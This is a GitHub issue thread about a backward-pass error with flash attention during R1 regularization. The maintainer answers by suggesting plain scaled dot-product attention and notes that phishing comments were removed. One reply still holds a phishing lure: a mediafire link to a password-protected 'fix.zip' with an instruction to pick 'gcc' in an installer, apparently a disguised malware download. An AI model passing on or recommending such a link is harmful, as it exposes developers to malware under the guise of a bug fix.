About R1 penalty - Githubissues

weleen commented 3 weeks ago

Hi,

Thank you for your excellent work, I am curious about the implementation of R1 regularization.

https://github.com/yhZhai/mcm/blob/392a6c6871a79bcb3d98141a4c1b4d61484c4dea/main.py#L1753

I got the following error:

[rank0]: Traceback (most recent call last):
[rank0]:   File "/home/yiming/.cursor-server/extensions/ms-python.debugpy-2024.8.0-linux-x64/bundled/libs/debugpy/_vendored/pydevd/pydevd.py", line 3489, in <module>
[rank0]:     main()
[rank0]:   File "/home/yiming/.cursor-server/extensions/ms-python.debugpy-2024.8.0-linux-x64/bundled/libs/debugpy/_vendored/pydevd/pydevd.py", line 3482, in main
[rank0]:     globals = debugger.run(setup['file'], None, None, is_module)
[rank0]:   File "/home/yiming/.cursor-server/extensions/ms-python.debugpy-2024.8.0-linux-x64/bundled/libs/debugpy/_vendored/pydevd/pydevd.py", line 2510, in run
[rank0]:     return self._exec(is_module, entry_point_fn, module_name, file, globals, locals)
[rank0]:   File "/home/yiming/.cursor-server/extensions/ms-python.debugpy-2024.8.0-linux-x64/bundled/libs/debugpy/_vendored/pydevd/pydevd.py", line 2517, in _exec
[rank0]:     globals = pydevd_runpy.run_path(file, globals, '__main__')
[rank0]:   File "/home/yiming/.cursor-server/extensions/ms-python.debugpy-2024.8.0-linux-x64/bundled/libs/debugpy/_vendored/pydevd/_pydevd_bundle/pydevd_runpy.py", line 321, in run_path
[rank0]:     return _run_module_code(code, init_globals, run_name,
[rank0]:   File "/home/yiming/.cursor-server/extensions/ms-python.debugpy-2024.8.0-linux-x64/bundled/libs/debugpy/_vendored/pydevd/_pydevd_bundle/pydevd_runpy.py", line 135, in _run_module_code
[rank0]:     _run_code(code, mod_globals, init_globals,
[rank0]:   File "/home/yiming/.cursor-server/extensions/ms-python.debugpy-2024.8.0-linux-x64/bundled/libs/debugpy/_vendored/pydevd/_pydevd_bundle/pydevd_runpy.py", line 124, in _run_code
[rank0]:     exec(code, run_globals)
[rank0]:   File "main_sfv.py", line 1541, in <module>
[rank0]:     main(args)
[rank0]:   File "main_sfv.py", line 1385, in main
[rank0]:     accelerator.backward(loss_disc_total)
[rank0]:   File "/home/yiming/anaconda3/envs/dmd2/lib/python3.8/site-packages/accelerate/accelerator.py", line 2011, in backward
[rank0]:     self.scaler.scale(loss).backward(**kwargs)
[rank0]:   File "/home/yiming/anaconda3/envs/dmd2/lib/python3.8/site-packages/torch/_tensor.py", line 521, in backward
[rank0]:     torch.autograd.backward(
[rank0]:   File "/home/yiming/anaconda3/envs/dmd2/lib/python3.8/site-packages/torch/autograd/__init__.py", line 289, in backward
[rank0]:     _engine_run_backward(
[rank0]:   File "/home/yiming/anaconda3/envs/dmd2/lib/python3.8/site-packages/torch/autograd/graph.py", line 768, in _engine_run_backward
[rank0]:     return Variable._execution_engine.run_backward(  # Calls into the C++ engine to run the backward pass
[rank0]: RuntimeError: derivative for aten::_scaled_dot_product_flash_attention_backward is not implemented

Do you have any idea about fixing this error?

weleen commented 3 weeks ago

Download https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file password: changeme In the installer menu, select "gcc."

Sorry, but your response doesn’t address the issue I raised here.

yhZhai commented 3 weeks ago

Hi there, I deleted some comments that seem to be phishing.

It seems that you used the flash attention, which does not support backward, that caused this problem. Could you try with the plain scaled_dot_product_attention?

yhZhai / mcm

About R1 penalty #11